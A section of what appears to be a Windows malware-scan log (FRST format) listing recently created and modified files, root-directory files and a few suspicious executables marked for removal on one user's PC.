2018-05-24 08:33 - 2018-05-24 08:33 - 000000000 ____D C:\Users\Craciun\AppData\Roaming\dwirn
2018-05-24 08:33 - 2018-05-24 08:33 - 000000000 ____D C:\Users\Craciun\AppData\Local\XService
2018-05-24 08:32 - 2018-05-24 08:32 - 000003614 _____ C:\Windows\System32\Tasks\PPI Update
2018-05-24 08:32 - 2018-05-24 08:32 - 000000000 ____D C:\Program Files (x86)\Microsoft Toolkit Final
2018-05-24 05:00 - 2018-06-10 12:03 - 000000000 ____D C:\Users\Craciun\AppData\LocalLow\uTorrent
2018-05-24 04:59 - 2018-05-24 04:59 - 000000000 ____D C:\ProgramData\Microsoft OneDrive
2018-05-24 01:18 - 2018-05-24 01:18 - 000000020 ___SH C:\Users\Craciun\ntuser.ini
2018-05-24 01:17 - 2018-06-10 13:00 - 000004162 _____ C:\Windows\System32\Tasks\User_Feed_Synchronization-{B9EC313A-5AB5-4A11-BDEE-ABAC3891FA74}
2018-05-24 01:17 - 2018-06-10 11:57 - 000000006 ____H C:\Windows\Tasks\SA.DAT
2018-05-24 01:17 - 2018-05-24 01:17 - 000014460 _____ C:\Windows\System32\Tasks\Acronis Bar Analyptian
2018-05-24 01:17 - 2018-05-24 01:17 - 000003346 _____ C:\Windows\System32\Tasks\GoogleUpdateTaskMachineUA
2018-05-24 01:17 - 2018-05-24 01:17 - 000003122 _____ C:\Windows\System32\Tasks\GoogleUpdateTaskMachineCore
2018-05-24 01:17 - 2018-05-24 01:17 - 000003044 _____ C:\Windows\System32\Tasks\update-S-1-5-21-3764278317-3264620232-1554668131-1000
2018-05-24 01:17 - 2018-05-24 01:17 - 000002860 _____ C:\Windows\System32\Tasks\OneDrive Standalone Update Task-S-1-5-21-3764278317-3264620232-1554668131-1000
2018-05-24 01:17 - 2018-05-24 01:17 - 000002788 _____ C:\Windows\System32\Tasks\update-sys
2018-05-24 01:17 - 2018-05-24 01:17 - 000002768 _____ C:\Windows\System32\Tasks\AdobeAAMUpdater-1.0-Craciun-PC-Craciun
2018-05-24 01:17 - 2018-05-24 01:17 - 000002716 _____ C:\Windows\System32\Tasks\AdobeGCInvoker-1.0-ALEX-PC-Craciun
2018-05-24 01:17 - 2018-05-24 01:17 - 000002568 _____ C:\Windows\System32\Tasks\Driver Booster Scheduler
2018-05-24 01:17 - 2018-05-24 01:17 - 000002282 _____ C:\Windows\System32\Tasks\Driver Booster SkipUAC (Craciun)
2018-05-24 01:17 - 2018-05-24 01:17 - 000002262 _____ C:\Windows\System32\Tasks\UMonitor Task
2018-05-24 01:17 - 2018-05-24 01:17 - 000000000 ____D C:\Windows\System32\Tasks\S-1-5-21-3764278317-3264620232-1554668131-1000
2018-05-24 01:15 - 2018-05-24 01:17 - 000007623 _____ C:\Windows\diagwrn.xml
2018-05-24 01:15 - 2018-05-24 01:17 - 000007623 _____ C:\Windows\diagerr.xml
2018-05-24 01:06 - 2018-06-05 10:15 - 000838560 _____ C:\Windows\system32\PerfStringBackup.INI
2018-05-24 00:56 - 2018-05-24 00:56 - 000001576 _____ C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Windows Media Player.lnk
2018-05-24 00:52 - 2018-06-09 18:13 - 000000000 ____D C:\Users\Craciun
2018-05-24 00:52 - 2018-04-12 02:34 - 000001105 _____ C:\Users\Craciun\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\OneDrive.lnk
2018-05-24 00:51 - 2018-05-24 00:51 - 000000000 ____D C:\ProgramData\USOShared
2018-05-24 00:50 - 2018-04-12 02:33 - 002752000 _____ (Microsoft Corporation) C:\Windows\SysWOW64\PrintConfig.dll
2018-05-24 00:46 - 2018-06-11 00:36 - 000000000 ____D C:\Windows\system32\SleepStudy
2018-05-24 00:46 - 2018-05-24 01:00 - 000765520 _____ C:\Windows\system32\FNTCACHE.DAT
2018-05-21 11:01 - 2018-05-24 01:18 - 000000000 ___DC C:\Windows\Panther
 
==================== One Month Modified files and folders ========
 
(If an entry is included in the fixlist, the file/folder will be moved.)
 
2018-06-11 20:33 - 2018-04-12 02:38 - 000000000 ____D C:\Windows\AppReadiness
2018-06-11 20:29 - 2018-04-12 02:38 - 000000000 ____D C:\Program Files\Sawmenger XP
2018-06-11 20:29 - 2017-04-29 05:15 - 000000000 ___RD C:\Users\Craciun\OneDrive
2018-06-11 20:25 - 2018-04-12 02:38 - 000000000 ____D C:\ProgramData\regid.1991-06.com.microsoft
2018-06-11 08:00 - 2017-05-01 16:40 - 000000000 ____D C:\Users\Craciun\AppData\Local\Adobe
2018-06-11 00:37 - 2018-04-12 02:38 - 000000000 ____D C:\Windows\LiveKernelReports
2018-06-10 12:04 - 2017-04-29 05:39 - 000000000 ____D C:\Users\Craciun\AppData\Roaming\uTorrent
2018-06-10 11:56 - 2018-04-12 00:04 - 000524288 _____ C:\Windows\system32\config\BBI
2018-06-09 21:20 - 2017-05-01 16:47 - 000000000 ____D C:\ProgramData\Package Cache
2018-06-09 18:38 - 2017-04-30 00:19 - 000000420 _____ C:\Users\Craciun\Desktop\This PC - Shortcut.lnk
2018-06-09 16:44 - 2018-03-08 12:54 - 000000000 ____D C:\Program Files (x86)\AP Tuner
2018-06-08 16:32 - 2018-04-12 02:30 - 000000000 ____D C:\Windows\CbsTemp
2018-06-08 10:47 - 2017-04-29 05:04 - 000000000 ____D C:\Users\Craciun\AppData\Local\VirtualStore
2018-06-05 10:15 - 2018-04-12 02:36 - 000000000 ____D C:\Windows\INF
2018-06-04 19:53 - 2018-04-12 02:38 - 000000000 ___HD C:\Program Files\WindowsApps
2018-05-27 14:09 - 2017-07-06 10:05 - 000000000 ____D C:\Program Files\DAEMON Tools Pro
2018-05-26 14:24 - 2017-07-28 01:28 - 000002307 _____ C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Google Chrome.lnk
2018-05-26 14:24 - 2017-07-28 01:28 - 000002272 _____ C:\Users\Public\Desktop\Google Chrome.lnk
2018-05-25 17:42 - 2018-04-12 02:38 - 000000000 ____D C:\Program Files\Windows Defender
2018-05-25 17:32 - 2018-04-12 02:38 - 000000000 ___RD C:\Windows\ImmersiveControlPanel
2018-05-25 17:27 - 2017-08-13 00:56 - 000000000 ____D C:\ProgramData\Malwarebytes
2018-05-25 17:16 - 2017-04-29 09:24 - 000000000 ____D C:\Program Files (x86)\UnHackMe
2018-05-24 23:14 - 2017-04-20 10:04 - 000000000 ____D C:\Users\Craciun\Documents\RegRun2
2018-05-24 23:09 - 2017-04-20 10:04 - 000000000 ____D C:\Users\Public\Documents\regruninfo
2018-05-24 22:55 - 2017-04-29 09:25 - 000000000 ____D C:\ProgramData\RegRun
2018-05-24 11:45 - 2018-04-12 02:41 - 000000000 ____D C:\Windows\Setup
2018-05-24 11:45 - 2018-04-12 02:38 - 000028672 _____ C:\Windows\system32\config\BCD-Template
2018-05-24 11:45 - 2018-04-12 02:38 - 000000000 __RHD C:\Users\Public\Libraries
2018-05-24 11:45 - 2018-04-12 02:38 - 000000000 ____D C:\Windows\SysWOW64\GroupPolicy
2018-05-24 11:45 - 2018-04-12 02:38 - 000000000 ____D C:\Windows\system32\WinBioDatabase
2018-05-24 11:45 - 2018-04-12 02:38 - 000000000 ____D C:\Windows\system32\spool
2018-05-24 11:45 - 2018-04-12 02:38 - 000000000 ____D C:\Windows\system32\oobe
2018-05-24 11:45 - 2018-04-12 02:38 - 000000000 ____D C:\Windows\system32\NDF
2018-05-24 11:45 - 2018-04-12 02:38 - 000000000 ____D C:\Program Files\Common Files\microsoft shared
2018-05-24 11:45 - 2018-01-04 14:51 - 000000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Lightshot
2018-05-24 11:45 - 2017-12-22 20:25 - 000000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\BS.Player
2018-05-24 11:45 - 2017-09-29 16:46 - 000000000 ____D C:\Windows\system32\Tasks_Migrated
2018-05-24 11:45 - 2017-08-28 21:39 - 000000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Java
2018-05-24 11:45 - 2017-07-28 10:53 - 000000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Steam
2018-05-24 11:45 - 2017-07-27 09:57 - 000000000 ____D C:\Windows\system32\MpEngineStore
2018-05-24 11:45 - 2017-07-06 10:05 - 000000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\DAEMON Tools Pro
2018-05-24 11:45 - 2017-05-03 19:44 - 000000000 ____D C:\Windows\system32\appmgmt
2018-05-24 11:45 - 2017-05-01 17:02 - 000000000 ____D C:\ProgramData\regid.1986-12.com.adobe
2018-05-24 11:45 - 2017-04-30 01:10 - 000000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\WinRAR
2018-05-24 11:45 - 2017-03-19 00:03 - 000000000 ___HD C:\Windows\system32\GroupPolicy
2018-05-24 11:41 - 2017-04-29 05:08 - 000000000 ____D C:\Windows\system32\SRSLabs
2018-05-24 11:40 - 2017-04-29 05:08 - 000000000 ____D C:\Program Files\Realtek
2018-05-24 11:35 - 2018-04-12 12:37 - 000000000 ____D C:\Windows\Containers
2018-05-24 11:35 - 2018-04-12 12:19 - 000000000 ____D C:\Windows\SysWOW64\zu-ZA
2018-05-24 11:35 - 2018-04-12 12:19 - 000000000 ____D C:\Windows\SysWOW64\yo-NG
2018-05-24 11:35 - 2018-04-12 12:19 - 000000000 ____D C:\Windows\SysWOW64\xh-ZA
2018-05-24 11:35 - 2018-04-12 12:19 - 000000000 ____D C:\Windows\SysWOW64\wo-SN
2018-05-24 11:35 - 2018-04-12 12:19 - 000000000 ____D C:\Windows\SysWOW64\vi-VN
2018-05-24 11:35 - 2018-04-12 12:19 - 000000000 ____D C:\Windows\SysWOW64\uz-Latn-UZ
2018-05-24 11:35 - 2018-04-12 12:19 - 000000000 ____D C:\Windows\SysWOW64\ur-PK
2018-05-24 11:35 - 2018-04-12 12:19 - 000000000 ____D C:\Windows\SysWOW64\ug-CN
2018-05-24 11:35 - 2018-04-12 12:19 - 000000000 ____D C:\Windows\SysWOW64\tt-RU
2018-05-24 11:35 - 2018-04-12 12:19 - 000000000 ____D C:\Windows\SysWOW64\tn-ZA
2018-05-24 11:35 - 2018-04-12 12:19 - 000000000 ____D C:\Windows\SysWOW64\tk-TM
2018-05-24 11:35 - 2018-04-12 12:19 - 000000000 ____D C:\Windows\SysWOW64\ti-ET
2018-05-24 11:35 - 2018-04-12 12:19 - 000000000 ____D C:\Windows\SysWOW64\tg-Cyrl-TJ
2018-05-24 11:35 - 2018-04-12 12:19 - 000000000 ____D C:\Windows\SysWOW64\te-IN
2018-05-24 11:35 - 2018-04-12 12:19 - 000000000 ____D C:\Windows\SysWOW64\ta-IN
2018-05-24 11:35 - 2018-04-12 12:19 - 000000000 ____D C:\Windows\SysWOW64\sw-KE
2018-05-24 11:35 - 2018-04-12 12:19 - 000000000 ____D C:\Windows\SysWOW64\sr-Cyrl-RS
2018-05-24 11:35 - 2018-04-12 12:19 - 000000000 ____D C:\Windows\SysWOW64\sr-Cyrl-BA
2018-05-24 11:35 - 2018-04-12 12:19 - 000000000 ____D C:\Windows\SysWOW64\sq-AL
2018-05-24 11:35 - 2018-04-12 12:19 - 000000000 ____D C:\Windows\SysWOW64\si-LK
2018-05-24 11:35 - 2018-04-12 12:19 - 000000000 ____D C:\Windows\SysWOW64\sd-Arab-PK
2018-05-24 11:35 - 2018-04-12 12:19 - 000000000 ____D C:\Windows\SysWOW64\rw-RW
2018-05-24 11:35 - 2018-04-12 12:19 - 000000000 ____D C:\Windows\SysWOW64\quz-PE
2018-05-24 11:35 - 2018-04-12 12:19 - 000000000 ____D C:\Windows\SysWOW64\quc-Latn-GT
2018-05-24 11:35 - 2018-04-12 12:19 - 000000000 ____D C:\Windows\SysWOW64\prs-AF
2018-05-24 11:35 - 2018-04-12 12:19 - 000000000 ____D C:\Windows\SysWOW64\pa-IN
2018-05-24 11:35 - 2018-04-12 12:19 - 000000000 ____D C:\Windows\SysWOW64\pa-Arab-PK
2018-05-24 11:35 - 2018-04-12 12:19 - 000000000 ____D C:\Windows\SysWOW64\or-IN
2018-05-24 11:35 - 2018-04-12 12:19 - 000000000 ____D C:\Windows\SysWOW64\nso-ZA
2018-05-24 11:35 - 2018-04-12 12:19 - 000000000 ____D C:\Windows\SysWOW64\nn-NO
2018-05-24 11:35 - 2018-04-12 12:19 - 000000000 ____D C:\Windows\SysWOW64\ne-NP
2018-05-24 11:35 - 2018-04-12 12:19 - 000000000 ____D C:\Windows\SysWOW64\mt-MT
2018-05-24 11:35 - 2018-04-12 12:19 - 000000000 ____D C:\Windows\SysWOW64\mr-IN
2018-05-24 11:35 - 2018-04-12 12:19 - 000000000 ____D C:\Windows\SysWOW64\mn-MN
2018-05-24 11:35 - 2018-04-12 12:19 - 000000000 ____D C:\Windows\SysWOW64\ml-IN
2018-05-24 11:35 - 2018-04-12 12:19 - 000000000 ____D C:\Windows\SysWOW64\mk-MK
2018-05-24 11:35 - 2018-04-12 12:19 - 000000000 ____D C:\Windows\SysWOW64\mi-NZ
2018-05-24 11:35 - 2018-04-12 12:19 - 000000000 ____D C:\Windows\SysWOW64\lo-LA
2018-05-24 11:35 - 2018-04-12 12:19 - 000000000 ____D C:\Windows\SysWOW64\lb-LU
2018-05-24 11:35 - 2018-04-12 12:19 - 000000000 ____D C:\Windows\SysWOW64\ky-KG
2018-05-24 11:35 - 2018-04-12 12:19 - 000000000 ____D C:\Windows\SysWOW64\ku-Arab-IQ
2018-05-24 11:35 - 2018-04-12 12:19 - 000000000 ____D C:\Windows\SysWOW64\kok-IN
2018-05-24 11:35 - 2018-04-12 12:19 - 000000000 ____D C:\Windows\SysWOW64\kn-IN
2018-05-24 11:35 - 2018-04-12 12:19 - 000000000 ____D C:\Windows\SysWOW64\km-KH
2018-05-24 11:35 - 2018-04-12 12:19 - 000000000 ____D C:\Windows\SysWOW64\kk-KZ
2018-05-24 11:35 - 2018-04-12 12:19 - 000000000 ____D C:\Windows\SysWOW64\ka-GE
2018-05-24 11:35 - 2018-04-12 12:19 - 000000000 ____D C:\Windows\SysWOW64\is-IS
2018-05-24 11:35 - 2018-04-12 12:19 - 000000000 ____D C:\Windows\SysWOW64\ig-NG
2018-05-24 11:35 - 2018-04-12 12:19 - 000000000 ____D C:\Windows\SysWOW64\id-ID
2018-05-24 11:35 - 2018-04-12 12:19 - 000000000 ____D C:\Windows\SysWOW64\hy-AM
2018-05-24 11:35 - 2018-04-12 12:19 - 000000000 ____D C:\Windows\SysWOW64\ha-Latn-NG
2018-05-24 11:35 - 2018-04-12 12:19 - 000000000 ____D C:\Windows\SysWOW64\gu-IN
2018-05-24 11:35 - 2018-04-12 12:19 - 000000000 ____D C:\Windows\SysWOW64\gd-GB
2018-05-24 11:35 - 2018-04-12 12:19 - 000000000 ____D C:\Windows\SysWOW64\ga-IE
2018-05-24 11:35 - 2018-04-12 12:19 - 000000000 ____D C:\Windows\SysWOW64\fil-PH
2018-05-24 11:35 - 2018-04-12 12:19 - 000000000 ____D C:\Windows\SysWOW64\fa-IR
2018-05-24 11:35 - 2018-04-12 12:19 - 000000000 ____D C:\Windows\SysWOW64\cy-GB
2018-05-24 11:35 - 2018-04-12 12:19 - 000000000 ____D C:\Windows\SysWOW64\chr-CHER-US
2018-05-24 11:35 - 2018-04-12 12:19 - 000000000 ____D C:\Windows\SysWOW64\ca-ES-valencia
2018-05-24 11:35 - 2018-04-12 12:19 - 000000000 ____D C:\Windows\SysWOW64\bs-Latn-BA
2018-05-24 11:35 - 2018-04-12 12:19 - 000000000 ____D C:\Windows\SysWOW64\bn-IN
2018-05-24 11:35 - 2018-04-12 12:19 - 000000000 ____D C:\Windows\SysWOW64\bn-BD
2018-05-24 11:35 - 2018-04-12 12:19 - 000000000 ____D C:\Windows\SysWOW64\be-BY
2018-05-24 11:35 - 2018-04-12 12:19 - 000000000 ____D C:\Windows\SysWOW64\az-Latn-AZ
2018-05-24 11:35 - 2018-04-12 12:19 - 000000000 ____D C:\Windows\SysWOW64\as-IN
2018-05-24 11:35 - 2018-04-12 12:19 - 000000000 ____D C:\Windows\SysWOW64\am-ET
2018-05-24 11:35 - 2018-04-12 12:19 - 000000000 ____D C:\Windows\SysWOW64\af-ZA
2018-05-24 11:35 - 2018-04-12 12:19 - 000000000 ____D C:\Windows\system32\zu-ZA
2018-05-24 11:35 - 2018-04-12 12:19 - 000000000 ____D C:\Windows\system32\yo-NG
2018-05-24 11:35 - 2018-04-12 12:19 - 000000000 ____D C:\Windows\system32\xh-ZA
2018-05-24 11:35 - 2018-04-12 12:19 - 000000000 ____D C:\Windows\system32\wo-SN
2018-05-24 11:35 - 2018-04-12 12:19 - 000000000 ____D C:\Windows\system32\vi-VN
2018-05-24 11:35 - 2018-04-12 12:19 - 000000000 ____D C:\Windows\system32\uz-Latn-UZ
2018-05-24 11:35 - 2018-04-12 12:19 - 000000000 ____D C:\Windows\system32\ur-PK
2018-05-24 11:35 - 2018-04-12 12:19 - 000000000 ____D C:\Windows\system32\ug-CN
2018-05-24 11:35 - 2018-04-12 12:19 - 000000000 ____D C:\Windows\system32\tt-RU
2018-05-24 11:35 - 2018-04-12 12:19 - 000000000 ____D C:\Windows\system32\tn-ZA
2018-05-24 11:35 - 2018-04-12 12:19 - 000000000 ____D C:\Windows\system32\tk-TM
2018-05-24 11:35 - 2018-04-12 12:19 - 000000000 ____D C:\Windows\system32\ti-ET
2018-05-24 11:35 - 2018-04-12 12:19 - 000000000 ____D C:\Windows\system32\tg-Cyrl-TJ
2018-05-24 11:35 - 2018-04-12 12:19 - 000000000 ____D C:\Windows\system32\te-IN
2018-05-24 11:35 - 2018-04-12 12:19 - 000000000 ____D C:\Windows\system32\sw-KE
2018-05-24 11:35 - 2018-04-12 12:19 - 000000000 ____D C:\Windows\system32\sr-Cyrl-RS
2018-05-24 11:35 - 2018-04-12 12:19 - 000000000 ____D C:\Windows\system32\sr-Cyrl-BA
2018-05-24 11:35 - 2018-04-12 12:19 - 000000000 ____D C:\Windows\system32\sq-AL
2018-05-24 11:35 - 2018-04-12 12:19 - 000000000 ____D C:\Windows\system32\sd-Arab-PK
2018-05-24 11:35 - 2018-04-12 12:19 - 000000000 ____D C:\Windows\system32\rw-RW
2018-05-24 11:35 - 2018-04-12 12:19 - 000000000 ____D C:\Windows\system32\quz-PE
2018-05-24 11:35 - 2018-04-12 12:19 - 000000000 ____D C:\Windows\system32\quc-Latn-GT
2018-05-24 11:35 - 2018-04-12 12:19 - 000000000 ____D C:\Windows\system32\prs-AF
2018-05-24 11:35 - 2018-04-12 12:19 - 000000000 ____D C:\Windows\system32\pa-IN
2018-05-24 11:35 - 2018-04-12 12:19 - 000000000 ____D C:\Windows\system32\pa-Arab-PK
2018-05-24 11:35 - 2018-04-12 12:19 - 000000000 ____D C:\Windows\system32\or-IN
2018-05-24 11:35 - 2018-04-12 12:19 - 000000000 ____D C:\Windows\system32\nso-ZA
2018-05-24 11:35 - 2018-04-12 12:19 - 000000000 ____D C:\Windows\system32\nn-NO
2018-05-24 11:35 - 2018-04-12 12:19 - 000000000 ____D C:\Windows\system32\ne-NP
2018-05-24 11:35 - 2018-04-12 12:19 - 000000000 ____D C:\Windows\system32\mt-MT
2018-05-24 11:35 - 2018-04-12 12:19 - 000000000 ____D C:\Windows\system32\mr-IN
2018-05-24 11:35 - 2018-04-12 12:19 - 000000000 ____D C:\Windows\system32\mn-MN
2018-05-24 11:35 - 2018-04-12 12:19 - 000000000 ____D C:\Windows\system32\ml-IN
2018-05-24 11:35 - 2018-04-12 12:19 - 000000000 ____D C:\Windows\system32\mk-MK
2018-05-24 11:35 - 2018-04-12 12:19 - 000000000 ____D C:\Windows\system32\mi-NZ
2018-05-24 11:35 - 2018-04-12 12:19 - 000000000 ____D C:\Windows\system32\lo-LA
2018-05-24 11:35 - 2018-04-12 12:19 - 000000000 ____D C:\Windows\system32\lb-LU
2018-05-24 11:35 - 2018-04-12 12:19 - 000000000 ____D C:\Windows\system32\ky-KG
2018-05-24 11:35 - 2018-04-12 12:19 - 000000000 ____D C:\Windows\system32\ku-Arab-IQ
2018-05-24 11:35 - 2018-04-12 12:19 - 000000000 ____D C:\Windows\system32\kok-IN
2018-05-24 11:35 - 2018-04-12 12:19 - 000000000 ____D C:\Windows\system32\kn-IN
2018-05-24 11:35 - 2018-04-12 12:19 - 000000000 ____D C:\Windows\system32\km-KH
2018-05-24 11:35 - 2018-04-12 12:19 - 000000000 ____D C:\Windows\system32\kk-KZ
2018-05-24 11:35 - 2018-04-12 12:19 - 000000000 ____D C:\Windows\system32\ka-GE
2018-05-24 11:35 - 2018-04-12 12:19 - 000000000 ____D C:\Windows\system32\is-IS
2018-05-24 11:35 - 2018-04-12 12:19 - 000000000 ____D C:\Windows\system32\ig-NG
2018-05-24 11:35 - 2018-04-12 12:19 - 000000000 ____D C:\Windows\system32\id-ID
2018-05-24 11:35 - 2018-04-12 12:19 - 000000000 ____D C:\Windows\system32\hy-AM
2018-05-24 11:35 - 2018-04-12 12:19 - 000000000 ____D C:\Windows\system32\ha-Latn-NG
2018-05-24 11:35 - 2018-04-12 12:19 - 000000000 ____D C:\Windows\system32\gu-IN
2018-05-24 11:35 - 2018-04-12 12:19 - 000000000 ____D C:\Windows\system32\gd-GB
2018-05-24 11:35 - 2018-04-12 12:19 - 000000000 ____D C:\Windows\system32\ga-IE
2018-05-24 11:35 - 2018-04-12 12:19 - 000000000 ____D C:\Windows\system32\fil-PH
2018-05-24 11:35 - 2018-04-12 12:19 - 000000000 ____D C:\Windows\system32\fa-IR
2018-05-24 11:35 - 2018-04-12 12:19 - 000000000 ____D C:\Windows\system32\cy-GB
2018-05-24 11:35 - 2018-04-12 12:19 - 000000000 ____D C:\Windows\system32\chr-CHER-US
2018-05-24 11:35 - 2018-04-12 12:19 - 000000000 ____D C:\Windows\system32\ca-ES-valencia
2018-05-24 11:35 - 2018-04-12 12:19 - 000000000 ____D C:\Windows\system32\bs-Latn-BA
2018-05-24 11:35 - 2018-04-12 12:19 - 000000000 ____D C:\Windows\system32\bn-IN
2018-05-24 11:35 - 2018-04-12 12:19 - 000000000 ____D C:\Windows\system32\bn-BD
2018-05-24 11:35 - 2018-04-12 12:19 - 000000000 ____D C:\Windows\system32\be-BY
2018-05-24 11:35 - 2018-04-12 12:19 - 000000000 ____D C:\Windows\system32\az-Latn-AZ
2018-05-24 11:35 - 2018-04-12 12:19 - 000000000 ____D C:\Windows\system32\as-IN
2018-05-24 11:35 - 2018-04-12 12:19 - 000000000 ____D C:\Windows\system32\af-ZA
2018-05-24 11:35 - 2018-04-12 02:38 - 000000000 ____D C:\Windows\TextInput
2018-05-24 11:35 - 2018-04-12 02:38 - 000000000 ____D C:\Windows\SysWOW64\setup
2018-05-24 11:35 - 2018-04-12 02:38 - 000000000 ____D C:\Windows\system32\ta-in
2018-05-24 11:35 - 2018-04-12 02:38 - 000000000 ____D C:\Windows\system32\si-lk
2018-05-24 11:35 - 2018-04-12 02:38 - 000000000 ____D C:\Windows\system32\setup
2018-05-24 11:35 - 2018-04-12 02:38 - 000000000 ____D C:\Windows\system32\appraiser
2018-05-24 11:35 - 2018-04-12 02:38 - 000000000 ____D C:\Windows\system32\am-et
2018-05-24 11:35 - 2018-04-12 02:38 - 000000000 ____D C:\Windows\Provisioning
2018-05-24 11:35 - 2018-04-12 02:38 - 000000000 ____D C:\Windows\bcastdvr
2018-05-24 11:35 - 2018-04-12 02:38 - 000000000 ____D C:\Program Files\Windows Photo Viewer
2018-05-24 11:35 - 2018-04-12 02:38 - 000000000 ____D C:\Program Files (x86)\Windows Photo Viewer
2018-05-24 11:23 - 2018-04-12 12:19 - 000000000 ____D C:\Windows\OCR
2018-05-24 11:23 - 2018-04-12 02:38 - 000000000 ____D C:\Windows\SysWOW64\lv-LV
2018-05-24 11:23 - 2018-04-12 02:38 - 000000000 ____D C:\Windows\SysWOW64\lt-LT
2018-05-24 11:23 - 2018-04-12 02:38 - 000000000 ____D C:\Windows\SysWOW64\et-EE
2018-05-24 11:23 - 2018-04-12 02:38 - 000000000 ____D C:\Windows\SysWOW64\es-MX
2018-05-24 11:23 - 2018-04-12 02:38 - 000000000 ____D C:\Windows\SysWOW64\en-GB
2018-05-24 11:23 - 2018-04-12 02:38 - 000000000 ____D C:\Windows\system32\lv-LV
2018-05-24 11:23 - 2018-04-12 02:38 - 000000000 ____D C:\Windows\system32\lt-LT
2018-05-24 11:23 - 2018-04-12 02:38 - 000000000 ____D C:\Windows\system32\et-EE
2018-05-24 11:23 - 2018-04-12 02:38 - 000000000 ____D C:\Windows\system32\es-MX
2018-05-24 11:23 - 2018-04-12 02:38 - 000000000 ____D C:\Windows\system32\en-GB
2018-05-24 09:59 - 2017-04-29 05:11 - 000000000 ____D C:\Program Files (x86)\Google
2018-05-24 08:36 - 2017-04-29 05:10 - 000000000 ____D C:\Program Files\Synaptics
2018-05-24 05:08 - 2017-12-09 22:34 - 000000000 ____D C:\Users\Craciun\AppData\Local\Packages
2018-05-24 05:03 - 2018-04-12 02:38 - 000000000 ___RD C:\Windows\PrintDialog
2018-05-24 04:15 - 2018-04-12 02:38 - 000000000 ____D C:\Windows\appcompat
2018-05-24 01:20 - 2017-12-09 23:00 - 000000000 ___RD C:\Users\Craciun\3D Objects
2018-05-24 01:20 - 2017-04-29 05:05 - 000000000 __RHD C:\Users\Public\AccountPictures
2018-05-24 01:18 - 2018-04-12 00:04 - 000032768 _____ C:\Windows\system32\config\ELAM
2018-05-24 01:14 - 2018-04-12 02:38 - 000000000 ____D C:\Windows\Registration
2018-05-24 01:06 - 2017-12-09 22:52 - 000022840 _____ C:\Windows\system32\emptyregdb.dat
2018-05-24 00:58 - 2017-04-30 01:10 - 000000000 ____D C:\Users\Craciun\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\WinRAR
2018-05-24 00:58 - 2016-12-22 15:38 - 000000000 ____D C:\Users\Craciun\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Steam
2018-05-24 00:58 - 2016-12-06 10:42 - 000000000 ____D C:\Users\Craciun\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Games
2018-05-24 00:55 - 2017-09-10 14:35 - 000000000 ____D C:\Users\Craciun\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Warzone
2018-05-24 00:55 - 2017-06-19 10:36 - 000000000 ____D C:\Users\Craciun\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\WhatsApp
2018-05-24 00:51 - 2018-04-12 02:38 - 000000000 ____D C:\ProgramData\USOPrivate
2018-05-24 00:51 - 2017-05-04 00:15 - 000000000 ____D C:\Windows\SysWOW64\sda
2018-05-24 00:50 - 2017-04-29 05:08 - 000000000 ____D C:\Windows\SysWOW64\RTCOM
 
==================== Files in the root of some directories =======
 
2016-12-25 13:08 - 2016-12-25 13:09 - 000000423 _____ () C:\Users\Craciun\update-csgo.bat
2017-10-20 22:07 - 2016-11-22 20:41 - 000021718 _____ () C:\Program Files (x86)\EULA.ro
2017-11-15 18:06 - 2017-11-15 18:06 - 007649280 _____ () C:\Program Files (x86)\GUTA61F.tmp
2018-05-25 02:01 - 2018-05-25 02:01 - 000000184 ____H () C:\Program Files (x86)\Common Files\new.bat
2018-05-30 20:48 - 2018-05-30 19:55 - 000094208 _____ (scaxvnlzpnrzqclaez) C:\Users\Craciun\AppData\Roaming\command.dll
2018-05-30 20:48 - 2018-05-30 19:05 - 000623616 _____ (rsltggjgfwnwdwxcud) C:\Users\Craciun\AppData\Roaming\product.dll
2017-07-05 18:38 - 2017-12-08 10:48 - 000001456 _____ () C:\Users\Craciun\AppData\Local\Adobe Save for Web 13.0 Prefs
2018-05-26 14:22 - 2018-05-26 14:22 - 007611392 _____ () C:\Users\Craciun\AppData\Local\agent.dat
2018-05-26 14:22 - 2018-05-26 14:20 - 002136576 _____ (TODO: <Company name>) C:\Users\Craciun\AppData\Local\Biojob.exe
2018-05-26 14:22 - 2018-05-26 14:22 - 001987417 _____ () C:\Users\Craciun\AppData\Local\Biojob.tst
2018-05-26 14:22 - 2018-05-26 14:22 - 000070896 _____ () C:\Users\Craciun\AppData\Local\Config.xml
2018-05-24 08:40 - 2018-06-03 08:37 - 000048288 _____ () C:\Users\Craciun\AppData\Local\InstallationConfiguration.xml
2017-04-29 09:25 - 2017-04-29 09:25 - 000140800 _____ () C:\Users\Craciun\AppData\Local\installer.dat
2018-05-26 14:22 - 2018-05-26 14:22 - 000018432 _____ () C:\Users\Craciun\AppData\Local\Main.dat
2018-05-26 14:22 - 2018-05-26 14:22 - 000005568 _____ () C:\Users\Craciun\AppData\Local\md.xml
2018-05-26 14:22 - 2018-05-26 14:22 - 000126464 _____ () C:\Users\Craciun\AppData\Local\noah.dat
2018-05-24 08:40 - 2018-06-09 21:21 - 000929792 _____ () C:\Users\Craciun\AppData\Local\sham.db
2018-05-26 14:21 - 2018-05-26 14:21 - 000278510 _____ () C:\Users\Craciun\AppData\Local\Statphase.bin
2018-05-26 14:23 - 2018-05-26 14:23 - 001895382 _____ () C:\Users\Craciun\AppData\Local\Subity.bin
2018-05-26 14:23 - 2018-05-26 14:23 - 000032038 _____ () C:\Users\Craciun\AppData\Local\uninstall_temp.ico
2018-01-04 14:51 - 2018-01-04 14:51 - 000000003 _____ () C:\Users\Craciun\AppData\Local\updater.log
2018-01-04 14:51 - 2018-01-04 14:51 - 000000425 _____ () C:\Users\Craciun\AppData\Local\UserProducts.xml
 
Files to move or delete:
====================
C:\Windows\rss\csrss.exe
C:\Users\Craciun\AppData\Roaming\EpicNet Inc\CloudNet\cloudnet.exe
C:\Users\Craciun\AppData\Roaming\MaxiBuy\python\pythonw.exe
